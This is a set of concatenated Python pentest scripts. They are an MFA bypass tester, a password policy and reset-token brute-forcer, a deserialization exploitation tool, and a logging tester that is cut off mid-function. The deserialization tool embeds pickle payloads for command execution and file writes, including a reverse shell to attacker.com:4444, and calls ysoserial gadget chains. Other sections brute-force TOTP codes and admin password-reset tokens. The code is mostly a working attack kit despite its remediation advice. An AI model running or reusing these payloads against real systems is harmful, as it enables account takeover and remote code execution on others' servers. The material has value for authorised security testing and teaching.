test_codes = ['000000', '111111', '222222', '333333', '444444',
'555555', '666666', '777777', '888888', '999999']
successful_attempts = 0
for code in test_codes:
response = self.submit_totp_code(code)
if response.status_code == 200:
successful_attempts += 1
# Small delay between attempts
time.sleep(0.5)
if successful_attempts > 3:
findings.append({
'technique': 'rate_limit_bypass',
'vulnerability': 'Weak or no MFA rate limiting',
'evidence': f'{successful_attempts}/10 invalid codes accepted'
})
# Test parallel requests bypass
import concurrent.futures
def attempt_code(code):
return self.submit_totp_code(code)
# Send multiple requests simultaneously
with concurrent.futures.ThreadPoolExecutor(max_workers=10) as executor:
futures = [executor.submit(attempt_code, code) for code in test_codes]
parallel_success = 0
for future in concurrent.futures.as_completed(futures):
try:
response = future.result()
if response.status_code == 200:
parallel_success += 1
except:
pass
if parallel_success > 3:
findings.append({
'technique': 'rate_limit_bypass',
'vulnerability': 'Rate limiting bypassed via parallel requests',
'evidence': f'{parallel_success}/10 parallel invalid codes accepted'
})
return findings
def run_all_tests(self):
"""Run all MFA bypass tests"""
all_findings = []
print("[*] Starting MFA bypass tests")
for technique_name, technique_func in self.techniques.items():
print(f"[*] Testing {technique_name}...")
try:
findings = technique_func()
all_findings.extend(findings)
print(f"[+] {technique_name}: {len(findings)} findings")
except Exception as e:
print(f"[-] {technique_name} failed: {e}")
# Generate report
report = {
'total_findings': len(all_findings),
'findings_by_technique': {},
'findings_by_severity': {},
'detailed_findings': all_findings
}
# Categorize findings
for finding in all_findings:
technique = finding.get('technique', 'unknown')
if technique not in report['findings_by_technique']:
report['findings_by_technique'][technique] = 0
report['findings_by_technique'][technique] += 1
return report
# Helper methods (implement based on target application)
def submit_backup_code(self, code):
"""Submit backup code to MFA endpoint"""
url = urljoin(self.base_url, '/api/mfa/backup')
return self.session.post(url, json={'code': code})
def submit_totp_code(self, code):
"""Submit TOTP code to MFA endpoint"""
url = urljoin(self.base_url, '/api/mfa/verify')
return self.session.post(url, json={'code': code})
def start_mfa_process(self):
"""Start MFA process"""
url = urljoin(self.base_url, '/api/mfa/start')
return self.session.post(url)
def get_session_state(self):
"""Get current session state"""
return self.session.cookies.get_dict()
def complete_mfa(self):
"""Complete MFA process (simulated)"""
url = urljoin(self.base_url, '/api/mfa/complete')
return self.session.post(url)
def use_session(self, session_cookies):
"""Use specific session cookies"""
temp_session = requests.Session()
temp_session.cookies.update(session_cookies)
url = urljoin(self.base_url, '/api/user/profile')
return temp_session.get(url)
# Usage
tester = MFABypassTester(
"http://target.com",
session_cookies={"SESSION": "your_session_id"}
)
report = tester.run_all_tests()
print(f"\n{'='*60}")
print("MFA BYPASS TESTING REPORT")
print(f"{'='*60}")
print(f"Total Findings: {report['total_findings']}")
if report['total_findings'] > 0:
print(f"\nFindings by Technique:")
for technique, count in report['findings_by_technique'].items():
print(f" {technique}: {count}")
print(f"\nCRITICAL FINDINGS:")
critical_findings = [f for f in report['detailed_findings']
if 'reuse' in f.get('vulnerability', '').lower() or
'bypass' in f.get('vulnerability', '').lower()]
for finding in critical_findings[:3]:
print(f" - {finding['vulnerability']}")
print(f" Evidence: {finding.get('evidence', '')[:100]}...")#!/usr/bin/env python3
"""
Advanced Password Policy Testing and Weakness Analysis
Tests password policies, reset mechanisms, and storage
"""
import requests
import re
import hashlib
import json
from typing import Dict, List
from urllib.parse import urljoin
import time
class PasswordPolicyTester:
def __init__(self, base_url):
self.base_url = base_url
self.session = requests.Session()
self.findings = []
def test_password_complexity(self):
"""Test password complexity requirements"""
findings = []
test_passwords = [
# Common weak passwords
('password', 'No complexity'),
('123456', 'No complexity'),
('qwerty', 'No complexity'),
('letmein', 'No complexity'),
# Short passwords
('a', 'Too short'),
('ab', 'Too short'),
('abc', 'Too short'),
('abcd', 'Too short'),
# Common patterns
('Password1', 'Common pattern'),
('Welcome1', 'Common pattern'),
('Summer2023', 'Common pattern'),
('Winter2023!', 'Common pattern'),
# Sequential characters
('abcdefg', 'Sequential letters'),
('12345678', 'Sequential numbers'),
('qwertyui', 'Keyboard pattern'),
('asdfghjk', 'Keyboard pattern'),
# Repetitive characters
('aaaaaa', 'Repeating characters'),
('111111', 'Repeating numbers'),
('ababab', 'Repeating pattern'),
# Dictionary words
('dragon', 'Dictionary word'),
('sunshine', 'Dictionary word'),
('princess', 'Dictionary word'),
('football', 'Dictionary word'),
]
registration_endpoint = urljoin(self.base_url, '/api/register')
for password, reason in test_passwords:
test_data = {
'username': f'test_{int(time.time())}_{reason[:10]}',
'email': f'test_{int(time.time())}@example.com',
'password': password,
'confirm_password': password
}
try:
response = self.session.post(registration_endpoint, json=test_data)
if response.status_code == 200:
findings.append({
'test': 'password_complexity',
'password': password,
'reason': reason,
'result': 'ACCEPTED (VULNERABLE)',
'evidence': f'Weak password "{password}" accepted during registration'
})
else:
# Check error message
error_msg = response.text.lower()
if 'password' in error_msg and ('weak' in error_msg or 'strength' in error_msg):
findings.append({
'test': 'password_complexity',
'password': password,
'reason': reason,
'result': 'REJECTED (GOOD)',
'evidence': f'Weak password "{password}" rejected: {error_msg[:100]}'
})
except Exception as e:
findings.append({
'test': 'password_complexity',
'password': password,
'reason': reason,
'result': 'ERROR',
'evidence': str(e)
})
time.sleep(0.5) # Rate limiting
return findings
def test_password_history(self):
"""Test password history/reuse policy"""
findings = []
# This test requires creating a user and changing password multiple times
# Step 1: Create test user
user_data = {
'username': f'history_test_{int(time.time())}',
'email': f'history_{int(time.time())}@example.com',
'password': 'InitialPassword1!',
'confirm_password': 'InitialPassword1!'
}
register_response = self.session.post(
urljoin(self.base_url, '/api/register'),
json=user_data
)
if register_response.status_code == 200:
# Login
login_response = self.session.post(
urljoin(self.base_url, '/api/login'),
json={
'email': user_data['email'],
'password': user_data['password']
}
)
if login_response.status_code == 200:
# Test password changes
test_passwords = [
'NewPassword1!',
'AnotherPassword2@',
'InitialPassword1!' # Try to reuse original
]
for new_password in test_passwords:
change_response = self.session.post(
urljoin(self.base_url, '/api/change-password'),
json={
'current_password': user_data['password'],
'new_password': new_password,
'confirm_password': new_password
}
)
if change_response.status_code == 200:
if new_password == 'InitialPassword1!':
findings.append({
'test': 'password_history',
'result': 'VULNERABLE',
'evidence': 'Previous password reused successfully'
})
else:
# Update current password for next iteration
user_data['password'] = new_password
else:
if new_password == 'InitialPassword1!':
error_msg = change_response.text.lower()
if 'previous' in error_msg or 'history' in error_msg:
findings.append({
'test': 'password_history',
'result': 'SECURE',
'evidence': 'Password history enforced: ' + error_msg[:100]
})
return findings
def test_password_reset_mechanism(self):
"""Test password reset functionality for weaknesses"""
findings = []
# Test 1: Token predictability
test_emails = [
'test@example.com',
'admin@target.com',
'user@target.com'
]
for email in test_emails:
# Request password reset
reset_request = self.session.post(
urljoin(self.base_url, '/api/password/reset/request'),
json={'email': email}
)
if reset_request.status_code == 200:
# Check for information disclosure
response_text = reset_request.text.lower()
if 'exist' in response_text or 'not found' in response_text:
findings.append({
'test': 'password_reset_info_disclosure',
'email': email,
'result': 'VULNERABLE',
'evidence': 'Email existence disclosed in reset response'
})
# Test 2: Reset token brute force
# Generate predictable tokens
predictable_tokens = [
'000000', '111111', '123456', '654321',
'abcdef', 'password', 'reset123'
]
for token in predictable_tokens:
reset_attempt = self.session.post(
urljoin(self.base_url, '/api/password/reset/confirm'),
json={
'token': token,
'new_password': 'NewPassword123!'
}
)
if reset_attempt.status_code == 200:
findings.append({
'test': 'password_reset_token_bruteforce',
'token': token,
'result': 'VULNERABLE',
'evidence': f'Predictable token accepted: {token}'
})
# Test 3: Token expiration
# This would require capturing a valid token and testing after expiration
# For demonstration, we'll note the test
findings.append({
'test': 'password_reset_token_expiration',
'result': 'MANUAL_TEST_REQUIRED',
'evidence': 'Manually test if reset tokens expire appropriately'
})
# Test 4: Account takeover via password reset
# Attempt to reset password for another user
takeover_attempt = self.session.post(
urljoin(self.base_url, '/api/password/reset/request'),
json={'email': 'admin@target.com'}
)
if takeover_attempt.status_code == 200:
# Check if any verification is required
response_text = takeover_attempt.text
if 'sent' in response_text.lower() and 'email' in response_text.lower():
findings.append({
'test': 'password_reset_account_takeover',
'result': 'POTENTIALLY_VULNERABLE',
'evidence': 'Password reset initiated for admin without additional verification'
})
return findings
def test_password_storage(self):
"""Test for password storage weaknesses"""
findings = []
# This test requires access to the database or password hashes
# We'll test what we can from the outside
# Test 1: Check for password in URLs
login_response = self.session.post(
urljoin(self.base_url, '/api/login'),
json={'email': 'test@example.com', 'password': 'testpassword'}
)
# Check if password appears in logs, URLs, or responses
# (This would typically require server access or careful monitoring)
# Test 2: Check for weak hashing (timing attack indication)
# Measure response times for valid vs invalid passwords
test_credentials = [
('realuser@example.com', 'realpassword'),
('realuser@example.com', 'wrongpassword'),
('nonexistent@example.com', 'anypassword')
]
response_times = []
for email, password in test_credentials:
start_time = time.time()
response = self.session.post(
urljoin(self.base_url, '/api/login'),
json={'email': email, 'password': password},
timeout=5
)
elapsed = time.time() - start_time
response_times.append((email, password[:3] + '...', elapsed))
time.sleep(1) # Rate limiting
# Analyze timing differences
if len(response_times) >= 2:
valid_time = response_times[0][2] # Real credentials
invalid_time = response_times[1][2] # Wrong password
# Significant timing difference might indicate hash verification
if abs(valid_time - invalid_time) > 0.1: # 100ms difference
findings.append({
'test': 'password_hash_timing',
'result': 'POTENTIAL_INDICATOR',
'evidence': f'Timing difference detected: {valid_time:.3f}s vs {invalid_time:.3f}s'
})
# Test 3: Check for password in error messages
error_test = self.session.post(
urljoin(self.base_url, '/api/login'),
json={'email': '', 'password': ''}
)
error_text = error_test.text.lower()
if 'password' in error_text and ('hash' in error_text or 'encrypt' in error_text):
findings.append({
'test': 'password_storage_info_disclosure',
'result': 'VULNERABLE',
'evidence': 'Password storage mechanism disclosed in error message'
})
return findings
def test_account_lockout(self):
"""Test account lockout mechanisms"""
findings = []
test_email = f'lockout_test_{int(time.time())}@example.com'
# Create test user
register_data = {
'username': f'lockout_{int(time.time())}',
'email': test_email,
'password': 'ValidPassword1!',
'confirm_password': 'ValidPassword1!'
}
register_response = self.session.post(
urljoin(self.base_url, '/api/register'),
json=register_data
)
if register_response.status_code == 200:
# Attempt multiple failed logins
failed_attempts = 0
lockout_detected = False
for i in range(15): # Try 15 times
login_response = self.session.post(
urljoin(self.base_url, '/api/login'),
json={'email': test_email, 'password': 'WrongPassword!'}
)
if login_response.status_code != 200:
failed_attempts += 1
# Check for lockout message
response_text = login_response.text.lower()
if any(term in response_text for term in ['lock', 'disable', 'suspend', 'too many']):
lockout_detected = True
lockout_attempt = i + 1
break
time.sleep(0.5)
if lockout_detected:
findings.append({
'test': 'account_lockout',
'result': 'SECURE',
'evidence': f'Account locked after {lockout_attempt} failed attempts'
})
else:
findings.append({
'test': 'account_lockout',
'result': 'VULNERABLE',
'evidence': f'No lockout after {failed_attempts} failed attempts'
})
return findings
def run_comprehensive_test(self):
"""Run all password policy tests"""
print("[*] Starting comprehensive password policy testing")
all_findings = []
tests = [
('Password Complexity', self.test_password_complexity),
('Password History', self.test_password_history),
('Password Reset', self.test_password_reset_mechanism),
('Password Storage', self.test_password_storage),
('Account Lockout', self.test_account_lockout)
]
for test_name, test_func in tests:
print(f"[*] Running {test_name} test...")
try:
findings = test_func()
all_findings.extend(findings)
print(f"[+] {test_name}: {len(findings)} findings")
except Exception as e:
print(f"[-] {test_name} test failed: {e}")
# Generate report
report = self.generate_report(all_findings)
return report
def generate_report(self, findings):
"""Generate password policy test report"""
report = {
'total_tests': 5,
'total_findings': len(findings),
'findings_by_severity': self.categorize_findings(findings),
'findings_by_test': {},
'detailed_findings': findings,
'recommendations': self.generate_recommendations(findings)
}
# Group findings by test
for finding in findings:
test_type = finding.get('test', 'unknown')
if test_type not in report['findings_by_test']:
report['findings_by_test'][test_type] = 0
report['findings_by_test'][test_type] += 1
return report
def categorize_findings(self, findings):
"""Categorize findings by severity"""
categories = {
'CRITICAL': [],
'HIGH': [],
'MEDIUM': [],
'LOW': [],
'INFO': []
}
for finding in findings:
result = finding.get('result', '')
if 'VULNERABLE' in result:
# Determine severity based on test type
test_type = finding.get('test', '')
if 'reset' in test_type.lower() or 'takeover' in test_type.lower():
categories['CRITICAL'].append(finding)
elif 'lockout' in test_type.lower() or 'history' in test_type.lower():
categories['HIGH'].append(finding)
elif 'complexity' in test_type.lower():
categories['MEDIUM'].append(finding)
else:
categories['LOW'].append(finding)
elif 'SECURE' in result:
categories['INFO'].append(finding)
else:
categories['INFO'].append(finding)
return {k: len(v) for k, v in categories.items()}
def generate_recommendations(self, findings):
"""Generate security recommendations based on findings"""
recommendations = []
vulnerable_tests = [f for f in findings if 'VULNERABLE' in f.get('result', '')]
if any('password_complexity' in f.get('test', '') for f in vulnerable_tests):
recommendations.append({
'priority': 'HIGH',
'recommendation': 'Implement stronger password complexity requirements',
'details': [
'Minimum 12 characters',
'Require mix of uppercase, lowercase, numbers, and special characters',
'Reject common passwords and patterns',
'Implement password strength meter'
]
})
if any('password_history' in f.get('test', '') for f in vulnerable_tests):
recommendations.append({
'priority': 'MEDIUM',
'recommendation': 'Enforce password history',
'details': [
'Prevent reuse of last 10 passwords',
'Store password hashes securely',
'Enforce periodic password changes (90 days)'
]
})
if any('account_lockout' in f.get('test', '') for f in vulnerable_tests):
recommendations.append({
'priority': 'HIGH',
'recommendation': 'Implement account lockout mechanism',
'details': [
'Lock account after 5 failed attempts',
'Implement exponential backoff',
'Provide account recovery mechanism',
'Log all failed attempts'
]
})
if any('password_reset' in f.get('test', '') for f in vulnerable_tests):
recommendations.append({
'priority': 'CRITICAL',
'recommendation': 'Secure password reset mechanism',
'details': [
'Use cryptographically secure tokens',
'Enforce token expiration (15 minutes)',
'Require additional verification for sensitive accounts',
'Do not disclose email existence',
'Implement rate limiting on reset requests'
]
})
return recommendations
# Usage
tester = PasswordPolicyTester("http://target.com")
report = tester.run_comprehensive_test()
print(f"\n{'='*60}")
print("PASSWORD POLICY TEST REPORT")
print(f"{'='*60}")
print(f"Total Tests: {report['total_tests']}")
print(f"Total Findings: {report['total_findings']}")
print(f"\nFindings by Severity:")
for severity, count in report['findings_by_severity'].items():
if count > 0:
print(f" {severity}: {count}")
print(f"\nFindings by Test:")
for test, count in report['findings_by_test'].items():
print(f" {test}: {count}")
print(f"\nSECURITY RECOMMENDATIONS:")
for rec in report['recommendations']:
print(f"\n[{rec['priority']}] {rec['recommendation']}")
for detail in rec['details'][:3]: # Show first 3 details
print(f" • {detail}")#!/usr/bin/env python3
"""
Advanced Deserialization Attack Detection and Exploitation
Covers multiple languages and frameworks
"""
import requests
import base64
import pickle
import json
import re
from typing import Dict, List
import subprocess
import tempfile
import os
class DeserializationTester:
def __init__(self, target_url):
self.target_url = target_url
self.session = requests.Session()
self.findings = []
# Deserialization payloads for different languages
self.payloads = {
'java': {
'indicators': ['rO0AB', 'ACED', 'sr='], # Base64 indicators
'test_payloads': [
# Simple serialized object
'rO0ABXVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAJ0AAI9PXQAAj09',
# With different encodings
'ACED0005737200116A6176612E6C616E672E426F6F6C65616EC373B7D891C155020000787200106A6176612E6C616E672E4F626A65637400000000000000000000007870',
]
},
'python': {
'indicators': ['gASV', 'KGlL', 'ccopy_reg'],
'test_payloads': [
# Pickle payloads
b'\x80\x04\x95\x15\x00\x00\x00\x00\x00\x00\x00\x8c\x08__main__\x94\x8c\x07TestObj\x94\x93\x94)\x81\x94.',
# Base64 encoded pickle
'gANjYnVpbHRpbnMKZXZhbApxAFgUAAAAcHJpbnQoImhlbGxvIHdvcmxkIikqcQGFcQJScQM=',
]
},
'php': {
'indicators': ['O:', 'a:', 's:', 'i:', 'd:', 'b:'],
'test_payloads': [
# Serialized PHP array
'a:2:{s:4:"name";s:5:"admin";s:5:"admin";b:1;}',
# Serialized PHP object
'O:8:"stdClass":2:{s:4:"name";s:5:"admin";s:5:"admin";b:1;}',
]
},
'dotnet': {
'indicators': ['AAEAAAD', 'AAAAA', 'v4.0.30319'],
'test_payloads': [
# .NET serialized data (simplified)
'AAEAAAD/////AQAAAAAAAAAEAQAAAH9TeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0DAAAA',
]
}
}
def detect_deserialization(self):
"""Detect deserialization endpoints and parameters"""
findings = []
# Test common deserialization endpoints
endpoints = [
'/api/data',
'/api/object',
'/api/serialize',
'/api/deserialize',
'/api/import',
'/api/export',
'/api/session',
'/api/cookie',
'/api/token',
'/api/config',
]
for endpoint in endpoints:
url = self.target_url.rstrip('/') + endpoint
# Test GET
response = self.session.get(url)
if response.status_code == 200:
# Check for serialized data in response
serialization_found = self.check_serialization_indicators(response.text)
if serialization_found:
findings.append({
'type': 'deserialization_endpoint',
'endpoint': endpoint,
'method': 'GET',
'evidence': f'Serialized data found at {endpoint}',
'indicators': serialization_found
})
# Test POST with various content types
content_types = [
('application/json', {'data': 'test'}),
('application/x-www-form-urlencoded', {'data': 'test'}),
('application/xml', '<data>test</data>'),
]
for content_type, data in content_types:
headers = {'Content-Type': content_type}
# Test with serialized payload
for lang, lang_data in self.payloads.items():
for payload in lang_data['test_payloads'][:1]: # Test first payload
if isinstance(payload, bytes):
payload_str = base64.b64encode(payload).decode()
else:
payload_str = payload
test_data = {'input': payload_str, 'data': payload_str}
response = self.session.post(
url,
data=test_data if content_type == 'application/x-www-form-urlencoded' else None,
json=test_data if content_type == 'application/json' else None,
headers=headers
)
# Analyze response for deserialization indicators
if self.analyze_deserialization_response(response, lang):
findings.append({
'type': 'deserialization_vulnerability',
'endpoint': endpoint,
'language': lang,
'method': 'POST',
'content_type': content_type,
'evidence': f'Deserialization detected for {lang} at {endpoint}'
})
return findings
def check_serialization_indicators(self, text):
"""Check text for serialization indicators"""
found_indicators = []
for lang, lang_data in self.payloads.items():
for indicator in lang_data['indicators']:
if indicator in text:
found_indicators.append(f'{lang}: {indicator}')
return found_indicators
def analyze_deserialization_response(self, response, language):
"""Analyze response for deserialization success/failure"""
if response.status_code != 200:
# Check for deserialization-specific error messages
error_text = response.text.lower()
deserialization_errors = [
'deserialization', 'serialization', 'unmarshal',
'pickle', 'unpickle', 'objectinputstream',
'binaryformatter', 'serializable',
'invalid class', 'class not found',
'unsafe deserialization'
]
if any(error in error_text for error in deserialization_errors):
return True
# Check for successful deserialization indicators
success_indicators = {
'java': ['serialversionuid', 'streamcorrupted', 'invalidtype'],
'python': ['pickle', 'unpickling', '__reduce__'],
'php': ['unserialize', 'serialize', '__wakeup'],
'dotnet': ['binaryformatter', 'serializable', 'formatter']
}
if language in success_indicators:
for indicator in success_indicators[language]:
if indicator.lower() in response.text.lower():
return True
return False
def test_java_deserialization(self):
"""Test for Java deserialization vulnerabilities"""
findings = []
# Use ysoserial to generate payloads
ysoserial_gadgets = [
'CommonsCollections1',
'CommonsCollections2',
'CommonsCollections3',
'CommonsCollections4',
'CommonsCollections5',
'CommonsCollections6',
'CommonsCollections7',
'Spring1',
'Spring2',
]
# Test each gadget chain
for gadget in ysoserial_gadgets[:3]: # Test first 3
print(f"[*] Testing Java gadget: {gadget}")
# Generate payload (in real test, you would have ysoserial installed)
# For demonstration, we'll create a simple payload
payload = self.generate_java_payload(gadget)
if payload:
# Test payload on target
test_endpoints = [
'/api/object',
'/api/data',
'/api/session',
'/api/import'
]
for endpoint in test_endpoints:
url = self.target_url.rstrip('/') + endpoint
# Test with different content types
test_cases = [
('application/java-serialized-object', payload),
('application/octet-stream', payload),
('application/json', {'data': base64.b64encode(payload).decode()}),
('application/x-www-form-urlencoded', {'data': base64.b64encode(payload).decode()})
]
for content_type, test_data in test_cases:
headers = {'Content-Type': content_type}
if content_type == 'application/json':
response = self.session.post(url, json=test_data, headers=headers)
else:
response = self.session.post(url, data=test_data, headers=headers)
# Check for successful exploitation
if self.check_exploitation_success(response, gadget):
findings.append({
'type': 'java_deserialization_exploit',
'gadget': gadget,
'endpoint': endpoint,
'content_type': content_type,
'evidence': f'Successful {gadget} exploitation at {endpoint}'
})
return findings
def generate_java_payload(self, gadget):
"""Generate Java deserialization payload"""
# In real testing, this would call ysoserial
# For demonstration, return a simple serialized object
try:
# Check if ysoserial is available
result = subprocess.run(
['java', '-jar', 'ysoserial.jar', gadget, 'touch /tmp/test'],
capture_output=True,
timeout=10
)
if result.returncode == 0:
return result.stdout
except:
# Fallback to simple payload
pass
# Return a simple Java serialized object
return b'rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAABh3CAAAABAAAAABc3IADmphdmEubGFuZy5PYmplY3QAAAAAAAAAAAIAAHhwdwgAAAAAP0AAABh3CAAAABQAAAABc3IADmphdmEubGFuZy5TdHJpbmcAAAAAAAAAAAIAAHhwcHB4'
def test_python_pickle(self):
"""Test Python pickle deserialization"""
findings = []
# Generate pickle payloads
pickle_payloads = [
# Simple command execution
b"""cos
system
(S'echo vulnerable'
tR.""",
# Reverse shell (encoded)
b"""c__builtin__
exec
(S'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker.com",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
tR.""",
# File write
b"""c__builtin__
open
(S'/tmp/pwned'
S'w'
tR(S'pwned'
tR.""",
]
for payload in pickle_payloads:
# Encode for transmission
encoded_payload = base64.b64encode(payload).decode()
# Test endpoints
test_endpoints = [
'/api/data',
'/api/pickle',
'/api/load',
'/api/config'
]
for endpoint in test_endpoints:
url = self.target_url.rstrip('/') + endpoint
# Test different parameter names
test_params = ['data', 'input', 'pickle', 'object', 'config']
for param in test_params:
test_data = {param: encoded_payload}
response = self.session.post(
url,
json=test_data,
headers={'Content-Type': 'application/json'}
)
# Check for signs of exploitation
if response.status_code != 200:
# Look for pickle-related errors
if 'pickle' in response.text.lower() or 'unpickl' in response.text.lower():
findings.append({
'type': 'python_pickle_vulnerability',
'endpoint': endpoint,
'parameter': param,
'evidence': f'Pickle deserialization at {endpoint}?{param}'
})
return findings
def test_php_deserialization(self):
"""Test PHP deserialization vulnerabilities"""
findings = []
# PHP deserialization payloads
php_payloads = [
# Simple object injection
'O:8:"stdClass":1:{s:4:"test";s:5:"value";}',
# With __wakeup or __destruct
'O:7:"MyClass":1:{s:3:"cmd";s:10:"uname -a";}',
# PHPGGC generated payloads (if available)
]
for payload in php_payloads:
# Test endpoints
test_endpoints = [
'/api/data',
'/api/session',
'/api/cookie',
'/api/user'
]
for endpoint in test_endpoints:
url = self.target_url.rstrip('/') + endpoint
# Test in different locations
test_locations = [
('POST data', {'data': payload}),
('Cookie', {'PHPSESSID': payload}),
('URL parameter', None), # Would be in URL
]
for location_name, test_data in test_locations:
if test_data:
response = self.session.post(url, data=test_data)
# Check for PHP deserialization indicators
if 'unserialize' in response.text or '__wakeup' in response.text:
findings.append({
'type': 'php_deserialization',
'endpoint': endpoint,
'location': location_name,
'evidence': f'PHP deserialization at {endpoint} ({location_name})'
})
return findings
def check_exploitation_success(self, response, gadget):
"""Check if exploitation was successful"""
# This would check for specific indicators of successful exploitation
# For example, if we're testing command execution, check for output
success_indicators = [
'vulnerable',
'pwned',
'uid=',
'root:',
'command executed',
'www-data'
]
for indicator in success_indicators:
if indicator in response.text:
return True
# Check for timing differences (blind exploitation)
# In real testing, you would use a collaborator or check for side effects
return False
def run_comprehensive_test(self):
"""Run all deserialization tests"""
print("[*] Starting comprehensive deserialization testing")
all_findings = []
# Detection phase
print("[*] Phase 1: Detecting deserialization endpoints")
detection_findings = self.detect_deserialization()
all_findings.extend(detection_findings)
print(f"[+] Detection: {len(detection_findings)} findings")
# Java testing
print("[*] Phase 2: Testing Java deserialization")
java_findings = self.test_java_deserialization()
all_findings.extend(java_findings)
print(f"[+] Java testing: {len(java_findings)} findings")
# Python testing
print("[*] Phase 3: Testing Python pickle")
python_findings = self.test_python_pickle()
all_findings.extend(python_findings)
print(f"[+] Python testing: {len(python_findings)} findings")
# PHP testing
print("[*] Phase 4: Testing PHP deserialization")
php_findings = self.test_php_deserialization()
all_findings.extend(php_findings)
print(f"[+] PHP testing: {len(php_findings)} findings")
# Generate report
report = {
'total_findings': len(all_findings),
'findings_by_type': {},
'findings_by_language': {},
'detailed_findings': all_findings,
'recommendations': self.generate_recommendations(all_findings)
}
# Categorize findings
for finding in all_findings:
# By type
finding_type = finding.get('type', 'unknown')
if finding_type not in report['findings_by_type']:
report['findings_by_type'][finding_type] = 0
report['findings_by_type'][finding_type] += 1
# By language
language = finding.get('language', 'unknown')
if language not in report['findings_by_language']:
report['findings_by_language'][language] = 0
report['findings_by_language'][language] += 1
return report
def generate_recommendations(self, findings):
"""Generate security recommendations"""
recommendations = []
if any('java' in str(f.get('language', '')).lower() for f in findings):
recommendations.append({
'priority': 'CRITICAL',
'title': 'Java Deserialization Protection',
'details': [
'Use serialization filters (ObjectInputFilter)',
'Avoid deserializing untrusted data',
'Use safer alternatives like JSON or XML',
'Update libraries (commons-collections, etc.)',
'Implement whitelisting for deserialized classes'
]
})
if any('python' in str(f.get('language', '')).lower() for f in findings):
recommendations.append({
'priority': 'CRITICAL',
'title': 'Python Pickle Security',
'details': [
'Never unpickle untrusted data',
'Use JSON, YAML, or MessagePack instead',
'Implement signing/verification if pickle is required',
'Use pickle with restricted globals (Unpickler.find_class)'
]
})
if any('php' in str(f.get('language', '')).lower() for f in findings):
recommendations.append({
'priority': 'HIGH',
'title': 'PHP Deserialization Security',
'details': [
'Avoid unserialize() with user input',
'Use json_decode() instead',
'Validate and sanitize all serialized data',
'Implement type checking after deserialization'
]
})
# General recommendations
recommendations.append({
'priority': 'HIGH',
'title': 'General Deserialization Best Practices',
'details': [
'Implement input validation for all serialized data',
'Use digital signatures to verify data integrity',
'Log all deserialization attempts and failures',
'Regularly update serialization libraries',
'Conduct security code reviews for deserialization code'
]
})
return recommendations
# Usage
tester = DeserializationTester("http://target.com")
report = tester.run_comprehensive_test()
print(f"\n{'='*60}")
print("DESERIALIZATION VULNERABILITY REPORT")
print(f"{'='*60}")
print(f"Total Findings: {report['total_findings']}")
if report['total_findings'] > 0:
print(f"\nFindings by Type:")
for finding_type, count in report['findings_by_type'].items():
print(f" {finding_type}: {count}")
print(f"\nFindings by Language:")
for language, count in report['findings_by_language'].items():
print(f" {language}: {count}")
print(f"\nCRITICAL FINDINGS:")
critical_findings = [f for f in report['detailed_findings']
if 'exploit' in f.get('type', '').lower() or
'vulnerability' in f.get('type', '').lower()]
for finding in critical_findings[:5]:
print(f" - {finding.get('type')}")
print(f" Evidence: {finding.get('evidence', '')[:100]}...")
print(f"\nSECURITY RECOMMENDATIONS:")
for rec in report['recommendations']:
print(f"\n[{rec['priority']}] {rec['title']}")
for detail in rec['details'][:3]:
print(f" • {detail}")#!/usr/bin/env python3
"""
Advanced Logging and Monitoring Testing Framework
Tests for inadequate logging, log evasion, and monitoring gaps
"""
import requests
import re
import json
import time
from datetime import datetime, timedelta
from typing import Dict, List
import hashlib
class LoggingMonitoringTester:
def __init__(self, base_url, auth_token=None):
self.base_url = base_url
self.session = requests.Session()
if auth_token:
self.session.headers.update({'Authorization': f'Bearer {auth_token}'})
self.attack_vectors = []
self.findings = []
def test_sensitive_actions_logging(self):
"""Test if sensitive actions are properly logged"""
findings = []
sensitive_actions = [
{
'name': 'Admin Login',
'endpoint': '/api/admin/login',
'method': 'POST',
'data': {'username': 'admin', 'password': 'test123'},
'expected_log_fields': ['username', 'ip_address', 'timestamp', 'success']
},
{
'name': 'Password Change',
'endpoint': '/api/user/change-password',
'method': 'POST',
'data': {'old_password': 'old123', 'new_password': 'new123'},
'expected_log_fields': ['user_id', 'timestamp', 'ip_address']
},
{
'name': 'Privilege Escalation',
'endpoint': '/api/admin/promote',
'method': 'POST',
'data': {'user_id': '123', 'role': 'admin'},
'expected_log_fields': ['admin_id', 'user_id', 'role', 'timestamp']
},
{
'name': 'Data Export',
'endpoint': '/api/data/export',
'method': 'POST',
'data': {'format': 'csv', 'filters': {'all': True}},
'expected_log_fields': ['user_id', 'export_type', 'record_count', 'timestamp']
},
{
'name': 'Configuration Change',
'endpoint': '/api/config/update',
'method': 'POST',
'data': {'setting': 'debug_mode', 'value': True},
'expected_log_fields': ['user_id', 'setting', 'old_value', 'new_value', 'timestamp']
}
]
for action in sensitive_actions:
print(f"[*] Testing logging for: {action['name']}")
# Perform the action
url = self.base_url.rstrip('/') + action['endpoint']
if action['method'] == 'POST':
response = self.session.post(url, json=action['data'])
else:
response = self.session.get(url)
# Check response
if response.status_code in [200, 201, 204]:
# Action succeeded, now we need to check logs
# In a real test, you would have access to the application logs
# For this example, we'll simulate log checking
log_available = self.check_logs_for_action(action['name'], action['expected_log_fields'])
if not log_available:
findings.append({
'test': 'sensitive_actions_logging',
'action': action['name'],
'result': 'FAIL',
'severity': 'HIGH',
'evidence': f'Sensitive action "{action["name"]}" not properly logged',
'missing_fields': action['expected_log_fields']
})
else:
findings.append({
'test': 'sensitive_actions_logging',
'action': action['name'],
'result': 'PASS',
'evidence': f'Action "{action["name"]}" logged appropriately'
})
else:
findings.append({
'test': 'sensitive_actions_logging',
'action': action['name'],
'result': 'SKIP',
'evidence': f'Action failed with status {response.status_code}'
})
return findings
def check_logs_for_action(self, action_name, expected_fields):
"""Check logs for specific action"""
# In a real test, this would query log files or monitoring system
# For demonstration, we'll return a simulated result
